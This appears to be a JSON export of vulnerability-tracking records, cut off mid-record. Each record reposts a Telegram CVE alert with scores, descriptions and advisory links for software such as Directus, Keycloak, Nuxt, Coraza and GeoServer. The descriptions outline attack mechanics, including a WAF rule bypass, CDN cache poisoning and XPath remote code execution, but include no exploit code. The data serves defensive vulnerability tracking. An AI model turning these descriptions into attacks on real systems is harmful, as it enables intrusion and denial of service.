"2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RV78-QQRQ-73M5", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8902", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30350\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\ud83d\udd39 Description: Directus is a real-time API and App dashboard for managing SQL database content. The `@directus/storage-driver-s3` package starting in version 9.22.0 and prior to version 12.0.1, corresponding to Directus starting in version 9.22.0 and prior to 11.5.0, is vulnerable to asset unavailability after a burst of HEAD requests. Some tools use Directus to sync content and assets, and some of those tools use the HEAD method to check the existence of files. When making many HEAD requests at once, at some point, all assets are eventually served as 403. This causes denial of assets for all policies of Directus, including Admin and Public. Version 12.0.1 of the `@directus/storage-driver-s3` package, corresponding to version 11.5.0 of Directus, fixes the issue.\n\ud83d\udccf Published: 2025-03-26T16:49:48.880Z\n\ud83d\udccf Modified: 2025-03-26T16:49:48.880Z\n\ud83d\udd17 References:\n1. https://github.com/directus/directus/security/advisories/GHSA-rv78-qqrq-73m5", "creation_timestamp": "2025-03-26T17:25:27.000000Z"}, {"uuid": "5758d2e7-49c2-4d90-92d0-67fdf39bd45d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-837Q-JHWX-CMPV", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8350", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30168\n\ud83d\udd25 CVSS Score: 6.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N)\n\ud83d\udd39 Description: Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to 7.5.2 and 8.0.2, the 3rd party authentication handling of Parse Server allows the authentication credentials of some specific authentication providers to be used across multiple Parse Server apps. For example, if a user signed up using the same authentication provider in two unrelated Parse Server apps, the credentials stored by one app can be used to authenticate the same user in the other app. Note that this only affects Parse Server apps that specifically use an affected 3rd party authentication provider for user authentication, for example by setting the Parse Server option auth to configure a Parse Server authentication adapter. The fix of this vulnerability requires to upgrade Parse Server to a version that includes the bug fix, as well as upgrade the client app to send a secure payload, which is different from the previous insecure payload. This vulnerability is fixed in 7.5.2 and 8.0.2.\n\ud83d\udccf Published: 2025-03-21T14:54:22.369Z\n\ud83d\udccf Modified: 2025-03-21T15:12:37.719Z\n\ud83d\udd17 References:\n1. https://github.com/parse-community/parse-server/security/advisories/GHSA-837q-jhwx-cmpv\n2. https://github.com/parse-community/parse-server/pull/9667\n3. https://github.com/parse-community/parse-server/pull/9668\n4. https://github.com/parse-community/parse-server/commit/2ff9c71030bce3aada0a00fbceedeb7ae2c8a41e\n5. https://github.com/parse-community/parse-server/commit/5ef0440c8e763854e62341acaeb6dc4ade3ba82f\n6. https://docs.parseplatform.org/parse-server/guide/#oauth-and-3rd-party-authentication", "creation_timestamp": "2025-03-21T15:19:28.000000Z"}, {"uuid": "3d9c1544-3560-4e6f-8d29-a2261a6e5a0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q9F5-625G-XM39", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8257", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-29914\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: OWASP Coraza WAF is a golang modsecurity compatible web application firewall library. Prior to 3.3.3, if a request is made on an URI starting with //, coraza will set a wrong value in REQUEST_FILENAME. For example, if the URI //bar/uploads/foo.php?a=b is passed to coraza: , REQUEST_FILENAME will be set to /uploads/foo.php. This can lead to a rules bypass. This vulnerability is fixed in 3.3.3.\n\ud83d\udccf Published: 2025-03-20T17:44:59.024Z\n\ud83d\udccf Modified: 2025-03-20T17:44:59.024Z\n\ud83d\udd17 References:\n1. https://github.com/corazawaf/coraza/security/advisories/GHSA-q9f5-625g-xm39\n2. https://github.com/corazawaf/coraza/commit/4722c9ad0d502abd56b8d6733c6b47eb4111742d", "creation_timestamp": "2025-03-20T18:20:54.000000Z"}, {"uuid": "a05226b0-bdf4-4d35-9df0-01623d5d90e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1866", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8934", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1249\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in Keycloak's OIDC component in the \"checkLoginIframe,\" which allows unvalidated cross-origin messages. This flaw allows attackers to coordinate and send millions of requests in seconds using simple code, significantly impacting the application's availability without proper origin validation for incoming messages.\n\ud83d\udccf Published: 2024-04-17T13:22:48.335Z\n\ud83d\udccf Modified: 2025-03-26T19:24:12.590Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1860\n2. https://access.redhat.com/errata/RHSA-2024:1861\n3. https://access.redhat.com/errata/RHSA-2024:1862\n4. https://access.redhat.com/errata/RHSA-2024:1864\n5. https://access.redhat.com/errata/RHSA-2024:1866\n6. https://access.redhat.com/errata/RHSA-2024:1867\n7. https://access.redhat.com/errata/RHSA-2024:1868\n8. https://access.redhat.com/errata/RHSA-2024:2945\n9. https://access.redhat.com/errata/RHSA-2024:4057\n10. https://access.redhat.com/security/cve/CVE-2024-1249\n11. https://bugzilla.redhat.com/show_bug.cgi?id=2262918", "creation_timestamp": "2025-03-26T19:26:07.000000Z"}, {"uuid": "af4b33a1-dff7-4e27-ac73-f62a63eb510e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2600", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7648", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12747\n\ud83d\udd25 CVSS Score: 5.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in rsync. This vulnerability arises from a race condition during rsync's handling of symbolic links. Rsync's default behavior when encountering symbolic links is to skip them. If an attacker replaced a regular file with a symbolic link at the right time, it was possible to bypass the default behavior and traverse symbolic links. Depending on the privileges of the rsync process, an attacker could leak sensitive information, potentially leading to privilege escalation.\n\ud83d\udccf Published: 2025-01-14T17:39:16.031Z\n\ud83d\udccf Modified: 2025-03-15T00:15:23.593Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2600\n2. https://access.redhat.com/security/cve/CVE-2024-12747\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2332968\n4. https://kb.cert.org/vuls/id/952657", "creation_timestamp": "2025-03-15T00:45:40.000000Z"}, {"uuid": "8fc4e5bb-b932-45ee-a073-36a2681e2442", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1122", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7645", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0750\n\ud83d\udd25 CVSS Score: 6.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H)\n\ud83d\udd39 Description: A vulnerability was found in CRI-O. A path traversal issue in the log management functions (UnMountPodLogs and LinkContainerLogs) may allow an attacker with permissions to create and delete Pods to unmount arbitrary host paths, leading to node-level denial of service by unmounting critical system directories.\n\ud83d\udccf Published: 2025-01-28T09:29:30.831Z\n\ud83d\udccf Modified: 2025-03-15T00:22:37.418Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:1122\n2. https://access.redhat.com/security/cve/CVE-2025-0750\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2339405", "creation_timestamp": "2025-03-15T00:45:37.000000Z"}, {"uuid": "75a0526a-7214-4cce-8982-f69474dda5f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1662", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7665", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1726\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\ud83d\udd39 Description: A flaw was discovered in the RESTEasy Reactive implementation in Quarkus. Due to security checks for some JAX-RS endpoints being performed after serialization, more processing resources are consumed while the HTTP request is checked. In certain configurations, if an attacker has knowledge of any POST, PUT, or PATCH request paths, they can potentially identify vulnerable endpoints and trigger excessive resource usage as the endpoints process the requests. This can result in a denial of service.\n\ud83d\udccf Published: 2024-04-25T16:29:04.615Z\n\ud83d\udccf Modified: 2025-03-15T04:10:46.621Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1662\n2. https://access.redhat.com/security/cve/CVE-2024-1726\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2265158", "creation_timestamp": "2025-03-15T04:45:14.000000Z"}, {"uuid": "f30e03bb-173b-4543-9eda-2d2e5c1e4801", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7858", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7651", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6563\n\ud83d\udd25 CVSS Score: 7.7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: An unconstrained memory consumption vulnerability was discovered in Keycloak. It can be triggered in environments which have millions of offline tokens (&gt; 500,000 users with each having at least 2 saved sessions). If an attacker creates two or more user sessions and then open the \"consents\" tab of the admin User Interface, the UI attempts to load a huge number of offline client sessions leading to excessive memory and CPU consumption which could potentially crash the entire system.\n\ud83d\udccf Published: 2023-12-14T18:01:26.005Z\n\ud83d\udccf Modified: 2025-03-15T03:33:57.850Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2023:7854\n2. https://access.redhat.com/errata/RHSA-2023:7855\n3. https://access.redhat.com/errata/RHSA-2023:7856\n4. https://access.redhat.com/errata/RHSA-2023:7857\n5. https://access.redhat.com/errata/RHSA-2023:7858\n6. https://access.redhat.com/security/cve/CVE-2023-6563\n7. https://bugzilla.redhat.com/show_bug.cgi?id=2253308\n8. https://github.com/keycloak/keycloak/issues/13340", "creation_timestamp": "2025-03-15T03:48:56.000000Z"}, {"uuid": "9f318fe5-5f62-415c-8f4b-110f496c9950", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7856", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7651", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6563\n\ud83d\udd25 CVSS Score: 7.7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: An unconstrained memory consumption vulnerability was discovered in Keycloak. It can be triggered in environments which have millions of offline tokens (&gt; 500,000 users with each having at least 2 saved sessions). If an attacker creates two or more user sessions and then open the \"consents\" tab of the admin User Interface, the UI attempts to load a huge number of offline client sessions leading to excessive memory and CPU consumption which could potentially crash the entire system.\n\ud83d\udccf Published: 2023-12-14T18:01:26.005Z\n\ud83d\udccf Modified: 2025-03-15T03:33:57.850Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2023:7854\n2. https://access.redhat.com/errata/RHSA-2023:7855\n3. https://access.redhat.com/errata/RHSA-2023:7856\n4. https://access.redhat.com/errata/RHSA-2023:7857\n5. https://access.redhat.com/errata/RHSA-2023:7858\n6. https://access.redhat.com/security/cve/CVE-2023-6563\n7. https://bugzilla.redhat.com/show_bug.cgi?id=2253308\n8. https://github.com/keycloak/keycloak/issues/13340", "creation_timestamp": "2025-03-15T03:48:56.000000Z"}, {"uuid": "57a919fc-7b66-4e28-b688-bee254417f3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HXG4-65P5-9W37", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8086", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30152\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N)\n\ud83d\udd39 Description: The Syliud PayPal Plugin is the Sylius Core Team\u2019s plugin for the PayPal Commerce Platform. Prior to 1.6.2, 1.7.2, and 2.0.2, a discovered vulnerability allows users to modify their shopping cart after completing the PayPal Checkout process and payment authorization. If a user initiates a PayPal transaction from a product page or the cart page and then returns to the order summary page, they can still manipulate the cart contents before finalizing the order. As a result, the order amount in Sylius may be higher than the amount actually captured by PayPal, leading to a scenario where merchants deliver products or services without full payment. The issue is fixed in versions: 1.6.2, 1.7.2, 2.0.2 and above.\n\ud83d\udccf Published: 2025-03-19T15:57:32.445Z\n\ud83d\udccf Modified: 2025-03-19T15:57:32.445Z\n\ud83d\udd17 References:\n1. https://github.com/Sylius/PayPalPlugin/security/advisories/GHSA-hxg4-65p5-9w37\n2. https://github.com/Sylius/PayPalPlugin/commit/5613df827a6d4fc50862229295976200a68e97aa", "creation_timestamp": "2025-03-19T16:18:08.000000Z"}, {"uuid": "630aa4f2-390f-404d-824e-9c6acb2c733c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0900", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8096", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12397\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: A flaw was found in Quarkus-HTTP, which incorrectly parses cookies with\ncertain value-delimiting characters in incoming requests. This issue could\nallow an attacker to construct a cookie value to exfiltrate HttpOnly cookie\nvalues or spoof arbitrary additional cookie values, leading to unauthorized\ndata access or modification. The main threat from this flaw impacts data\nconfidentiality and integrity.\n\ud83d\udccf Published: 2024-12-12T09:05:28.451Z\n\ud83d\udccf Modified: 2025-03-19T16:56:57.173Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0900\n2. https://access.redhat.com/errata/RHSA-2025:1082\n3. https://access.redhat.com/security/cve/CVE-2024-12397\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2331298", "creation_timestamp": "2025-03-19T17:20:59.000000Z"}, {"uuid": "01429d6f-707c-40b5-8a8d-9c7313c17390", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1082", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8096", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12397\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: A flaw was found in Quarkus-HTTP, which incorrectly parses cookies with\ncertain value-delimiting characters in incoming requests. This issue could\nallow an attacker to construct a cookie value to exfiltrate HttpOnly cookie\nvalues or spoof arbitrary additional cookie values, leading to unauthorized\ndata access or modification. The main threat from this flaw impacts data\nconfidentiality and integrity.\n\ud83d\udccf Published: 2024-12-12T09:05:28.451Z\n\ud83d\udccf Modified: 2025-03-19T16:56:57.173Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0900\n2. https://access.redhat.com/errata/RHSA-2025:1082\n3. https://access.redhat.com/security/cve/CVE-2024-12397\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2331298", "creation_timestamp": "2025-03-19T17:20:59.000000Z"}, {"uuid": "b1c745b2-498a-4910-9cb2-814a1fba853b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JVHM-GJRH-3H93", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8125", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27415\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: Nuxt is an open-source web development framework for Vue.js. Prior to 3.16.0, by sending a crafted HTTP request to a server behind an CDN, it is possible in some circumstances to poison the CDN cache and highly impacts the availability of a site. It is possible to craft a request, such as https://mysite.com/?/_payload.json which will be rendered as JSON. If the CDN in front of a Nuxt site ignores the query string when determining whether to cache a route, then this JSON response could be served to future visitors to the site. An attacker can perform this attack to a vulnerable site in order to make a site unavailable indefinitely. It is also possible in the case where the cache will be reset to make a small script to send a request each X seconds (=caching duration) so that the cache is permanently poisoned making the site completely unavailable. This vulnerability is fixed in 3.16.0.\n\ud83d\udccf Published: 2025-03-19T19:02:04.824Z\n\ud83d\udccf Modified: 2025-03-19T19:02:04.824Z\n\ud83d\udd17 References:\n1. https://github.com/nuxt/nuxt/security/advisories/GHSA-jvhm-gjrh-3h93", "creation_timestamp": "2025-03-19T19:18:19.000000Z"}, {"uuid": "10382f28-c415-4239-9ffc-f4f38b2fe2cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4850", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8167", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-0874\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in coredns. This issue could lead to invalid cache entries returning due to incorrectly implemented caching.\n\ud83d\udccf Published: 2024-04-25T16:22:44.182Z\n\ud83d\udccf Modified: 2025-03-20T02:44:49.516Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0041\n2. https://access.redhat.com/errata/RHSA-2024:4850\n3. https://access.redhat.com/errata/RHSA-2024:6009\n4. https://access.redhat.com/errata/RHSA-2024:6406\n5. https://access.redhat.com/security/cve/CVE-2024-0874\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2219234\n7. https://github.com/coredns/coredns/issues/6186\n8. https://github.com/coredns/coredns/pull/6354", "creation_timestamp": "2025-03-20T03:29:19.000000Z"}, {"uuid": "4d1df2bb-8ec5-4455-9fa2-1349ae06f1e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V63M-X9R9-8GQP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8382", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-2598\n\ud83d\udd25 CVSS Score: 5.7 (cvssV4_0, Vector: CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: When the AWS Cloud Development Kit (AWS CDK) Command Line Interface (AWS CDK CLI) is used with a credential plugin which returns an expiration property with the retrieved AWS credentials, the credentials are printed to the console output. To mitigate this issue, users should upgrade to version 2.178.2 or later and ensure any forked or derivative code is patched to incorporate the new fixes.\n\ud83d\udccf Published: 2025-03-21T14:14:29.040Z\n\ud83d\udccf Modified: 2025-03-21T16:27:39.401Z\n\ud83d\udd17 References:\n1. https://aws.amazon.com/security/security-bulletins/AWS-2025-005/\n2. https://github.com/aws/aws-cdk/security/advisories/GHSA-v63m-x9r9-8gqp", "creation_timestamp": "2025-03-21T17:19:21.000000Z"}, {"uuid": "5b354f14-860f-4188-866a-bb7bb41eb6d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-22Q5-9PHM-744V", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8150", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-29925\n\ud83d\udd25 CVSS Score: 8.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: XWiki Platform is a generic wiki platform. Prior to 15.10.14, 16.4.6, and 16.10.0-rc-1, protected pages are listed when requesting the REST endpoints /rest/wikis/[wikiName]/pages even if the user doesn't have view rights on them. It's particularly true if the entire wiki is protected with \"Prevent unregistered user to view pages\": the endpoint would still list the pages of the wiki, though only for the main wiki. The problem has been patched in XWiki 15.10.14, 16.4.6, 16.10.0RC1. In those versions the endpoint can still be requested but the result is filtered out based on pages rights.\n\ud83d\udccf Published: 2025-03-19T17:36:28.066Z\n\ud83d\udccf Modified: 2025-03-19T19:25:43.966Z\n\ud83d\udd17 References:\n1. https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-22q5-9phm-744v\n2. https://github.com/xwiki/xwiki-platform/commit/1fb12d2780f37b34a1b4dfdf8457d97ce5cbb2df\n3. https://github.com/xwiki/xwiki-platform/commit/bca72f5ce971a31dba2a016d8dd8badda4475206\n4. https://jira.xwiki.org/browse/XWIKI-22630\n5. https://jira.xwiki.org/browse/XWIKI-22639", "creation_timestamp": "2025-03-19T20:18:24.000000Z"}, {"uuid": "7e560688-9145-43dd-a36f-d131236650da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0041", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8167", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-0874\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in coredns. This issue could lead to invalid cache entries returning due to incorrectly implemented caching.\n\ud83d\udccf Published: 2024-04-25T16:22:44.182Z\n\ud83d\udccf Modified: 2025-03-20T02:44:49.516Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0041\n2. https://access.redhat.com/errata/RHSA-2024:4850\n3. https://access.redhat.com/errata/RHSA-2024:6009\n4. https://access.redhat.com/errata/RHSA-2024:6406\n5. https://access.redhat.com/security/cve/CVE-2024-0874\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2219234\n7. https://github.com/coredns/coredns/issues/6186\n8. https://github.com/coredns/coredns/pull/6354", "creation_timestamp": "2025-03-20T03:29:19.000000Z"}, {"uuid": "0db99427-572e-4863-8201-b28ebfc37a46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6406", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8167", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-0874\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in coredns. This issue could lead to invalid cache entries returning due to incorrectly implemented caching.\n\ud83d\udccf Published: 2024-04-25T16:22:44.182Z\n\ud83d\udccf Modified: 2025-03-20T02:44:49.516Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0041\n2. https://access.redhat.com/errata/RHSA-2024:4850\n3. https://access.redhat.com/errata/RHSA-2024:6009\n4. https://access.redhat.com/errata/RHSA-2024:6406\n5. https://access.redhat.com/security/cve/CVE-2024-0874\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2219234\n7. https://github.com/coredns/coredns/issues/6186\n8. https://github.com/coredns/coredns/pull/6354", "creation_timestamp": "2025-03-20T03:29:19.000000Z"}, {"uuid": "21adc5e3-05e1-47bf-8f1d-68e5c7b87799", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2865", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9010", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26597\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A buffer overflow flaw was found in X.Org and Xwayland. If XkbChangeTypesOfKey() is called with a 0 group, it will resize the key symbols table to 0 but leave the key actions unchanged. If the same function is later called with a non-zero value of groups, this will cause a buffer overflow because the key actions are of the wrong size.\n\ud83d\udccf Published: 2025-02-25T15:54:48.196Z\n\ud83d\udccf Modified: 2025-03-27T04:20:29.448Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26597\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345255", "creation_timestamp": "2025-03-27T04:25:53.000000Z"}, {"uuid": "26b7e5ba-281b-4df8-95c1-174950822f6c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6JJ6-GM7P-FCVV", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8062", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-36401\n\ud83d\udd25 CVSS Score: 9.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: GeoServer is an open source server that allows users to share and edit geospatial data. Prior to versions 2.22.6, 2.23.6, 2.24.4, and 2.25.2, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.\n\nThe GeoTools library API that GeoServer calls evaluates property/attribute names for feature types in a way that unsafely passes them to the commons-jxpath library which can execute arbitrary code when evaluating XPath expressions. This XPath evaluation is intended to be used only by complex feature types (i.e., Application Schema data stores) but is incorrectly being applied to simple feature types as well which makes this vulnerability apply to **ALL** GeoServer instances. No public PoC is provided but this vulnerability has been confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic and WPS Execute requests. This vulnerability can lead to executing arbitrary code.\n\nVersions 2.22.6, 2.23.6, 2.24.4, and 2.25.2 contain a patch for 